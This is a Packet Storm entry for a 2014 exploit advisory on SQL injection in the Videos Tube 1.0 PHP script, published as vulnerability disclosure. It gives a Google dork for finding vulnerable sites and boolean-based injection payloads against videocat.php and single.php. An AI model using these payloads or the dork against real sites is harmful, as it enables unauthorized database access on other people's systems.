Videos Tube 1.0 SQL Injection

2014-05-30T00:00:00
ID PACKETSTORM:126866
Type packetstorm
Reporter Mustafa ALTINKAYNAK
Modified 2014-05-30T00:00:00

Description

                                        
                                            `|  
  
# Exploit Title: Videos Tube SQL Injection and Remote Code Execution|  
|# Google Dork: inurl:"single.php?url=" video|  
|# Date: 05.05.2014|  
|# Exploit Author: Mustafa ALTINKAYNAK|  
|# Vendor Homepage: http://www.phpscriptlerim.com|  
|# Software Link: http://demo.phpscriptlerim.com/free/videostube/|  
|# Version: 1.0|  
|Description (Açýklama)|  
|========================|  
|Category, showing video on the page are two types of SQL injection.   
Boolean-based blind and AND / OR time-based blind. Incoming data can be   
filtered off light.|  
|Vulnerability|  
|========================|  
|1) videocat.php?url=test' AND 3383=3383 AND 'ODau'='ODau (with SQLMAP   
Tool)|  
|2) single.php?url=test' AND 3383=3383 AND 'ODau'='ODau (with SQLMap Tool)|  
--   
*Mustafa ALTINKAYNAK***  
`